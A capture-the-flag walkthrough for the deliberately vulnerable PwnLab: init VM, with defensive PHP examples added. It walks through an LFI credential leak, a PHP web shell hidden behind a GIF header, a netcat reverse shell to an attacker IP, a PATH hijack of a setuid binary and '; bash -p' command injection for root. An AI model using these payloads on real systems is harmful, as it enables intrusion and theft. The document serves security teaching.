Difference between revisions of "CTF PwnLab: init: Walkthrough"
Revision as of 08:38, 24 January 2023
Objective / Goal
- get into the system
- get root
Download & import into VirtualBox
https://www.vulnhub.com/entry/pwnlab-init,158/#download https://download.vulnhub.com/pwnlab/pwnlab_init.ova
Import pwnlab_init.ova into VirtualBox
- Load VirtualBox
- Import
Kali Linux
Check the VM's IP address
sudo su
netdiscover -r 192.168.0.0/24
The result looks roughly like this:
Currently scanning: Finished!   |   Screen View: Unique Hosts

29 Captured ARP Req/Rep packets, from 20 hosts.   Total size: 1740
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.2     40:16:7e:22:e7:69      1      60  ASUSTek COMPUTER INC.
192.168.0.4     10:6f:3f:3d:73:d0      1      60  BUFFALO.INC
192.168.0.7     4c:e6:76:1f:15:4b      1      60  BUFFALO.INC
192.168.0.9     10:6f:3f:17:94:94      1      60  BUFFALO.INC
192.168.0.7     4c:e6:76:1f:15:4c      1      60  BUFFALO.INC
192.168.0.60    74:d0:2b:6a:a9:66      1      60  ASUSTek COMPUTER INC.
192.168.0.101   08:60:6e:db:4e:b8      1      60  ASUSTek COMPUTER INC.
192.168.0.130   08:00:27:93:a2:1b      1      60  PCS Systemtechnik GmbH
192.168.0.141   b0:a7:b9:b6:c1:c9      2     120  TP-Link Corporation Limited
192.168.0.145   c0:56:27:1c:be:e1      1      60  Belkin International Inc.
192.168.0.169   4c:e6:76:1f:15:4b      1      60  BUFFALO.INC
192.168.0.170   4c:e6:76:1f:15:4b      1      60  BUFFALO.INC
192.168.0.169   4c:e6:76:1f:15:4c      4     240  BUFFALO.INC
192.168.0.170   4c:e6:76:1f:15:4c      1      60  BUFFALO.INC
192.168.0.199   b4:b0:24:3d:8b:3b      1      60  TP-Link Corporation Limited
192.168.0.102   6c:29:90:1e:89:7f      1      60  WiZ Connected Lighting Company Limited
192.168.0.223   c0:56:27:67:0d:a3      1      60  Belkin International Inc.
192.168.0.222   6c:16:32:63:52:21      3     180  HUAWEI TECHNOLOGIES CO.,LTD
192.168.0.224   28:ff:3e:5c:10:32      4     240  zte corporation
192.168.0.194   52:aa:ba:2c:0b:15      1      60  Unknown vendor
The suspicious MAC address is the one starting with 08:00:... (the VirtualBox NIC). Target IP address: 192.168.0.130.
Target enumeration
Run nmap -v -A against the target IP address,
nmap -v -A 192.168.0.130
The result looks roughly like this,
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-22 03:45 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Initiating ARP Ping Scan at 03:45
Scanning 192.168.0.130 [1 port]
Completed ARP Ping Scan at 03:45, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:45
Completed Parallel DNS resolution of 1 host. at 03:45, 0.00s elapsed
Initiating SYN Stealth Scan at 03:45
Scanning 192.168.0.130 [1000 ports]
Discovered open port 111/tcp on 192.168.0.130
Discovered open port 3306/tcp on 192.168.0.130
Discovered open port 80/tcp on 192.168.0.130
Completed SYN Stealth Scan at 03:45, 0.11s elapsed (1000 total ports)
Initiating Service scan at 03:45
Scanning 3 services on 192.168.0.130
Completed Service scan at 03:45, 6.05s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.130
NSE: Script scanning 192.168.0.130.
Initiating NSE at 03:45
Completed NSE at 03:45, 0.19s elapsed
Initiating NSE at 03:45
Completed NSE at 03:45, 0.03s elapsed
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Nmap scan report for 192.168.0.130
Host is up (0.00057s latency).

Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: PwnLab Intranet Image Hosting
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36677/udp6  status
|   100024  1          38362/tcp6  status
|   100024  1          47606/udp   status
|_  100024  1          48220/tcp   status
3306/tcp open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info:
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 38
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, SupportsLoadDataLocal, InteractiveClient, IgnoreSigpipes, LongPassword, ConnectWithDatabase, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, SupportsTransactions, FoundRows, SupportsCompression, LongColumnFlag, ODBCClient, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: -G^"+S@(D]'IzNT:dlpn
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:93:A2:1B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.016 days (since Sun Jan 22 03:22:46 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.57 ms 192.168.0.130

NSE: Script Post-scanning.
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.08 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)
An alternative is the onetwopunch.sh script, which can be obtained from
https://github.com/superkojiman/onetwopunch/blob/master/onetwopunch.sh
Usage:
onetwopunch.sh -t targets -p all -n "-sV -O --version-intensity=9"
From the nmap results, a few interesting things about the target stand out:
- There is a web server
- There is a database server
Investigating HTTP requests/responses
To investigate the target's web application:
- Inspect HTTP requests/responses. Tools: Burp Suite, Fiddler, Tamper Data/Cookies Manager+ (FF addons)
- Scan for vulnerabilities (outdated versions, LFI/RFI, SQLi, …). Tools: Nikto, sqlmap, nmap scripts
- Look for hidden/misconfigured directories or files. Tools: Dirbuster, GoBuster, Nikto
Or simply run nikto,
nikto -host 192.168.0.130
Result:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.130
+ Target Hostname:    192.168.0.130
+ Target Port:        80
+ Start Time:         2023-01-22 04:01:12 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2023-01-22 04:02:08 (GMT-5) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The interesting findings here:
- config.php probably contains a username/password for database access.
- a login form that needs further investigation, e.g.
http://192.168.0.130/?page=login
The page parameter is possibly vulnerable to LFI (Local File Inclusion).
Bruteforcing MySQL
A manual attempt at brute-forcing MySQL,
mysql -h 192.168.0.130 -u root -p
Enter password: (empty)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.0.62' (using password: NO)

mysql -h 192.168.0.130 -u root -p
Enter password: (root)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.0.62' (using password: YES)
It seems we can't break in manually.
Check the web app
Login Page
http://192.168.0.130/login.php
Try a SQL injection attack,
sqlmap -u "http://192.168.0.130/?page=login" --data="user=abcd&pass=abcd&submit=Login" --level=5 --risk=3 --dbms=mysql
The result:
.....
[04:51:46] [WARNING] parameter 'Host' does not seem to be injectable
[04:51:46] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[04:51:46] [WARNING] your sqlmap version is outdated

[*] ending @ 04:51:46 /2023-01-22/
The SQL injection attempt failed, so let's try the suspected LFI.
LFI vulnerability
Local File Inclusion (LFI) is a vulnerability often found in poorly written web applications. It occurs when a web application lets user-supplied input choose which file gets included, or lets users upload files to the server. Further reading: https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/
Example LFI code:
<?php
if (isset($_GET['page'])) {
    include($_GET['page'] . '.php');
}
?>
Let's try the URLs below (complete failure),
http://192.168.0.130/?page=/etc/passwd
http://192.168.0.130/?page=../../../../../../../etc/passwd
Use the php://filter wrapper to base64-encode the contents of a .php file, so that the server returns the source of the file we request instead of executing it. This technique appears to work,
http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=config
After base64-decoding the response we get config.php:
<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
Excellent! We have the MySQL username and password.
Let's continue the analysis with the PHP filter,
http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=index
We get index.php:
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
	include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ]
[ <a href="?page=login">Login</a> ]
[ <a href="?page=upload">Upload</a> ]
<hr /><br />
<?php
	if (isset($_GET['page']))
	{
		include($_GET['page'].".php");
	}
	else
	{
		echo "Use this server to upload and share image files inside the intranet";
	}
?>
</body>
</html>
Lines 4-6 (the $_COOKIE['lang'] include): LFI vulnerability. If we set a cookie named lang pointing to a file on the filesystem, that file is included. We don't even have to bother appending .php to it! Lines 20-23 (the $_GET['page'] include): the LFI vulnerability that gave us the source code, many thanks.
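The fix for both includes, as an added example that is not part of the challenge's code: map the client-supplied page and lang values onto a fixed table of files, so the request never contributes any path text to include(). The PAGES entries match the pages seen on this box; the LANGS file names are assumed, since the original leaves the language feature unimplemented.

```php
<?php
// Added example (not PwnLab's code): allowlisted page and language inclusion.
// index.php above builds include() paths from $_GET['page'] and
// $_COOKIE['lang']; that is what let php://filter and the lang cookie pull
// in arbitrary files. Never build the path from user input: look the input
// up in a fixed table and include only what the table says.

declare(strict_types=1);

// The only pages the application actually has. Keys are the values a client
// may send; values are the files that will be included.
const PAGES = [
    'login'  => __DIR__ . '/login.php',
    'upload' => __DIR__ . '/upload.php',
];

// Supported language files (assumed names; the original never finished this).
const LANGS = [
    'en' => __DIR__ . '/lang/en.lang.php',
    'es' => __DIR__ . '/lang/es.lang.php',
];

/**
 * Resolve a client-supplied name to a file path through an allowlist.
 * Returns null for anything not in the table, so "../../etc/passwd",
 * "php://filter/..." and "../upload/<hash>.png" are all rejected before any
 * filesystem or stream-wrapper access happens.
 */
function resolve_include(array $allowlist, ?string $name): ?string
{
    if ($name === null) {
        return null;
    }
    // Strict lookup: no normalisation, no string concatenation.
    return array_key_exists($name, $allowlist) ? $allowlist[$name] : null;
}

// --- request handling -----------------------------------------------------

$lang = resolve_include(LANGS, $_COOKIE['lang'] ?? null);
if ($lang !== null) {
    include $lang;   // a fixed path from the table, never the cookie value
}

$page = resolve_include(PAGES, $_GET['page'] ?? null);
if ($page !== null) {
    include $page;
} else {
    // Unknown or missing page: fall back to the default text instead of
    // echoing or including anything derived from the request.
    echo 'Use this server to upload and share image files inside the intranet';
}
```

With this in place the php://filter trick and the lang-cookie include used later in this walkthrough both fall through to the null branch, because neither string is a key in the table.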
http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=upload
We get upload.php:
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
	if ($_FILES['file']['error'] <= 0) {
		$filename  = $_FILES['file']['name'];
		$filetype  = $_FILES['file']['type'];
		$uploaddir = 'upload/';
		$file_ext  = strrchr($filename, '.');
		$imageinfo = getimagesize($_FILES['file']['tmp_name']);
		$whitelist = array(".jpg",".jpeg",".gif",".png");

		if (!(in_array($file_ext, $whitelist))) {
			die('Not allowed extension, please upload images only.');
		}

		if(strpos($filetype,'image') === false) {
			die('Error 001');
		}

		if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
			die('Error 002');
		}

		if(substr_count($filetype, '/')>1){
			die('Error 003');
		}

		$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

		if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
			echo "<img src=\"".$uploadfile."\">
";
		} else {
			die('Error 4');
		}
	}
}
?>
Up to this point we have been exploiting the page we saw above. But there seem to be many interesting things in this page too.
Lines 2-3 (the session check): this is what denied us when we tried to access the page. Lines 16-49: many conditions on uploading a file:
Err 0: whitelist for files ending in .jpg, .jpeg, .gif and .png
Err 1: file is not identified as an image
Err 2: HEX signature validation?
Err 3: file name contains '/' to avoid LFI
Err 4: failed to upload file
MySQL access
Next we will look at the possibility of uploading a backdoor. For that we need access to the upload page. Let's try accessing the MySQL database with the username and password found in config.php.
mysql -h 192.168.0.130 -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 21180
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Users              |
+--------------------+
2 rows in set (0.001 sec)

MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.001 sec)

MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.001 sec)

MySQL [Users]>
The passwords look like base64; decoding them, e.g. via https://www.base64decode.org/, gives,
kent: JWzXuBJJNy
mike: SIfdsTEn6I
kane: iSv5Ym2GRo
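Why the table gave up every password at once: base64 is reversible encoding, not hashing. As an added example (not the challenge's code), this is how the users table should store credentials, plus a one-off migration for a table that is already in the base64 state shown above. The row values used in the self-check are constructed placeholders, not the CTF's entries.

```php
<?php
// Added example (not PwnLab's code): storing credentials the way the users
// table above should have. Anyone who can read that table (here via
// LFI -> config.php -> MySQL) gets every cleartext password. password_hash()
// stores a salted, slow hash instead, and password_verify() checks against it.

declare(strict_types=1);

/** Value to store in users.pass for a new or changed password. */
function hash_for_storage(string $password): string
{
    // bcrypt by default; salt and cost factor are embedded in the output.
    return password_hash($password, PASSWORD_DEFAULT);
}

/** Check a login attempt against the stored hash (constant-time compare). */
function check_login(string $stored, string $attempt): bool
{
    return password_verify($attempt, $stored);
}

/**
 * One-off migration for a table in the state shown above: every row is
 * base64(password), so the cleartext is recoverable and can be rehashed in
 * place without forcing a reset. $rows is [user => pass column]; returns
 * [user => new pass column]. Strict decoding rejects rows that are not valid
 * base64 so they can be handled separately rather than silently mangled.
 */
function migrate_base64_rows(array $rows): array
{
    $out = [];
    foreach ($rows as $user => $b64) {
        $clear = base64_decode($b64, true);
        if ($clear === false) {
            throw new RuntimeException("row for $user is not base64");
        }
        $out[$user] = hash_for_storage($clear);
    }
    return $out;
}

/** Self-check on a constructed row (placeholder values, not the CTF's). */
function selfcheck(): bool
{
    $table    = ['alice' => base64_encode('example-pass')];
    $migrated = migrate_base64_rows($table);
    return check_login($migrated['alice'], 'example-pass')
        && !check_login($migrated['alice'], 'wrong')
        // the new column no longer decodes back to the password
        && base64_decode($migrated['alice'], true) !== 'example-pass';
}

echo selfcheck() ? "ok\n" : "FAILED\n";
```

Run it with php on the command line; it prints ok. The migration only works because the old scheme was reversible; for a table of real hashes the only option is rehashing on next successful login.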
Uploading a backdoor
Using one of the available username/password pairs lets us access the upload page. What we want now is a way to get a shell.
What about uploading a GIF that contains PHP code, and pulling it in through the LFI vulnerability we found earlier (the lang cookie)?
Create a fake PNG file containing PHP code:
GIF89; <?php system($_GET["cmd"]) ?>
The GIF89 header is used to bypass the type check; more on file signatures at https://en.wikipedia.org/wiki/List_of_file_signatures .
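Why every check in upload.php passes this file, and what a handler that does not would look like, as an added example that is not the challenge's code: the extension and Content-Type come from the client, and getimagesize() only parses the GIF header, so a file that begins with GIF bytes and then holds PHP text is accepted. The file only became dangerous because index.php later include()d it. The version below goes beyond the page's checks: it trusts only what the image decoder reports, re-encodes the pixels so foreign bytes are dropped, and stores the result under a server-chosen name outside the document root. The UPLOAD_DIR path and the image.php handler it links to are assumptions.

```php
<?php
// Added example (not PwnLab's code): a hardened replacement for upload.php.
// (1) accept only what the decoder says the file is, (2) re-encode so that
// anything that is not pixel data is discarded, (3) never let the client pick
// the stored name or extension, (4) keep uploads out of the web root.

declare(strict_types=1);

// Assumed storage location outside the document root (hypothetical path).
const UPLOAD_DIR = '/var/www/uploads';

// Decoder-reported type => [loader, saver, extension we assign].
// IMAGETYPE_* are PHP's own constants returned by getimagesize().
const ACCEPTED = [
    IMAGETYPE_GIF  => ['imagecreatefromgif',  'imagegif',  'gif'],
    IMAGETYPE_JPEG => ['imagecreatefromjpeg', 'imagejpeg', 'jpg'],
    IMAGETYPE_PNG  => ['imagecreatefrompng',  'imagepng',  'png'],
];

/**
 * Validate and re-encode an uploaded image. Returns the stored file name
 * (without directory) or throws RuntimeException on rejection.
 */
function store_image(string $tmpPath): string
{
    // 1. Ask the decoder, not the client, what this is. The client's
    //    filename and Content-Type are never consulted.
    $info = @getimagesize($tmpPath);
    if ($info === false || !array_key_exists($info[2], ACCEPTED)) {
        throw new RuntimeException('Not an accepted image type');
    }
    [$load, $save, $ext] = ACCEPTED[$info[2]];

    // 2. Fully decode the pixels. A header-only fake (GIF bytes followed by
    //    text) has no image data and fails here; if some trailing text did
    //    survive decoding it would be dropped by the re-encode in step 4.
    $im = @$load($tmpPath);
    if ($im === false) {
        throw new RuntimeException('Image data is corrupt');
    }

    // 3. Server-chosen name: random, with the extension we decided on.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;

    // 4. Re-encode. Only the pixel data is written to disk.
    $ok = $save($im, $dest);
    imagedestroy($im);
    if (!$ok) {
        throw new RuntimeException('Could not write image');
    }
    return $name;
}

if (isset($_POST['submit'], $_FILES['file'])
    && $_FILES['file']['error'] === UPLOAD_ERR_OK
    && is_uploaded_file($_FILES['file']['tmp_name'])) {
    try {
        $stored = store_image($_FILES['file']['tmp_name']);
        // Serve through a handler (hypothetical image.php) that streams the
        // file with the right Content-Type and never include()s it.
        echo '<img src="image.php?id=' . htmlspecialchars($stored, ENT_QUOTES) . '">';
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES);
    }
}
```

The two changes that matter most are the last ones: with uploads outside the document root and served only by a streaming handler, a file that somehow passed validation is still never interpreted by PHP, which removes the LFI-to-upload chain this walkthrough relies on regardless of how clever the image check is.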
Steps:
- Log in to pwnlab using one of
kent: JWzXuBJJNy
mike: SIfdsTEn6I
kane: iSv5Ym2GRo
- Upload it via the upload menu http://192.168.0.130/?page=upload
The uploaded PNG is stored under an md5-hashed name. This can be seen with Ctrl-U in the browser, which shows the md5-named path of the png we used,
../upload/d1a17e1e32f2bfa1b90a6754cadd1df8.png
Set the lang cookie so that the image we uploaded gets included
In Chrome, open Developer Tools (Ctrl-Shift-J or Tools -> Developer Tools) -> Console and enter the JavaScript command:
document.cookie="keyofcookie=valueofcookie"
We can replace or add a new cookie with this technique. We can also set multiple cookie attributes at once, e.g.,
document.cookie="username=John Doe; expires=Thu, 18 Dec 2013 12:00:00 UTC; path=/";
In the browser, press Ctrl-Shift-J and enter the cookie,
document.cookie="lang=../upload/d1a17e1e32f2bfa1b90a6754cadd1df8.png";
Start a netcat listener on Kali
Start a listener on port 4444
nc -nvlp 4444
Browse to connect back to the port
- check the Kali Linux IP address with "ifconfig eth0"; suppose the result is 192.168.0.94
- Browse to the URL (note the spaces)
http://192.168.0.130/?cmd=nc -nv 192.168.0.94 4444 -e /bin/bash
In the Kali Linux CLI you will see something like,
# nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.0.94] from (UNKNOWN) [192.168.0.130] 56439
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash");'
www-data@pwnlab:/var/www/html$
Privilege Escalation
Try user kent
From the shell, su to user kent.
cd /home
ls
www-data@pwnlab:/home$ ls -al
ls -al
total 24
drwxr-xr-x  6 root root 4096 Mar 17  2016 .
drwxr-xr-x 21 root root 4096 Mar 17  2016 ..
drwxr-x---  2 john john 4096 Mar 17  2016 john
drwxr-x---  2 kane kane 4096 Mar 17  2016 kane
drwxr-x---  2 kent kent 4096 Mar 17  2016 kent
drwxr-x---  2 mike mike 4096 Mar 17  2016 mike
www-data@pwnlab:/home$
Do the su to user kent:
www-data@pwnlab:/home$ su kent
su kent
Password: JWzXuBJJNy
kent@pwnlab:/home$ cd kent
cd kent
kent@pwnlab:~$ ls -al
ls -al
total 20
drwxr-x--- 2 kent kent 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kent kent  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kent kent 3515 Mar 17  2016 .bashrc
-rw-r--r-- 1 kent kent  675 Mar 17  2016 .profile
kent@pwnlab:~$ find / -user kent 2>/dev/null
find / -user kent 2>/dev/null
.........
/home/kent
/home/kent/.bashrc
/home/kent/.profile
/home/kent/.bash_logout
Try sudo -l
kent@pwnlab:~$ sudo -l
sudo -l
bash: sudo: command not found
kent can't sudo :( ..
exit
Try user kane
www-data@pwnlab:/home$ su kane
su kane
Password: iSv5Ym2GRo
kane@pwnlab:/home$ cd kane
kane@pwnlab:~$ ls -al
ls -al
total 28
drwxr-x--- 2 kane kane 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile
kane@pwnlab:~$ file msgmike
file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
kane@pwnlab:~$ strings msgmike
...
cat /home/mike/msg.txt
...
kane@pwnlab:~$
Note the setuid/setgid bits on msgmike (owned by mike). Are you thinking what I'm thinking? msgmike might be doing the following code:
#include <stdlib.h>

/* Guessed reconstruction of msgmike: "cat" is given with no path, so the
   shell started by system() resolves it through the caller's PATH. */
int main(void) {
    system("cat /home/mike/msg.txt");
    return 0;
}
This is very poorly configured: the cat command is found by searching the directories listed in the PATH environment variable for a file with that name. If we create a script called cat in a directory we control and override the PATH variable, we can get a shell as user mike!
If you're interested in such problems, check out root-me.org's system problems!
kane@pwnlab:~$ echo "/bin/bash" > cat
echo "/bin/bash #" > cat
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ export PATH=/home/kane
export PATH=/home/kane
kane@pwnlab:~$ ./msgmike
./msgmike
bash: dircolors: command not found
bash: ls: command not found
mike@pwnlab:~$
Running as mike and becoming root
You'll need to reset the PATH variable first.
mike@pwnlab:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
mike@pwnlab:~$ cd ../mike
cd ../mike
mike@pwnlab:/home/mike$ ls -al
ls -al
total 28
drwxr-x--- 2 mike mike 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 mike mike  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17  2016 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17  2016 .profile
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: wanna hook?
wanna hook?
wanna hook?
mike@pwnlab:/home/mike$ strings msg2root
strings msg2root
...
Message for root:
/bin/echo %s >> /root/messages.txt
...
mike@pwnlab:/home/mike$
Hmm… msg2root possibly looks like this (might not compile, don't complain!):
#include <stdio.h>
#include <stdlib.h>

/* Guessed reconstruction of msg2root, a setuid-root binary. */
char msg[1024];     // Let's assume no BO takes place, alrighty?
char command[1024];

int main(void) {
    printf("Message for root: ");
    scanf("%s", msg);
    /* The user's text is pasted straight into a shell command line. */
    snprintf(command, sizeof(command), "/bin/echo %s >> /root/messages.txt", msg);
    system(command);
    return 0;
}
Let's find a way in.
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: opensesame; bash -p      (-p to preserve current privileges)
opensesame; bash -p
opensesame
bash-4.3# whoami
whoami
root
bash-4.3# cd /root
cd /root
bash-4.3# ls -al
ls -al
total 20
drwx------  2 root root 4096 Mar 17  2016 .
drwxr-xr-x 21 root root 4096 Mar 17  2016 ..
lrwxrwxrwx  1 root root    9 Mar 17  2016 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
            1 root root 1840 Mar 17  2016 flag.txt
lrwxrwxrwx  1 root root    9 Mar 17  2016 messages.txt -> /dev/null
lrwxrwxrwx  1 root root    9 Mar 17  2016 .mysql_history -> /dev/null
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
bash-4.3# cat flag.txt
cat flag.txt

[ASCII-art "Congrats" banner]

If you are reading this, means that you have break 'init'
Pwnlab. I hope you enjoyed and thanks for your time doing
this challenge.

Please send me your feedback or your writeup, I will love
reading it

For sniferl4bs.com
claor@PwnLab.net - @Chronicoder

bash-4.3#
That was fun! Thanks for reading!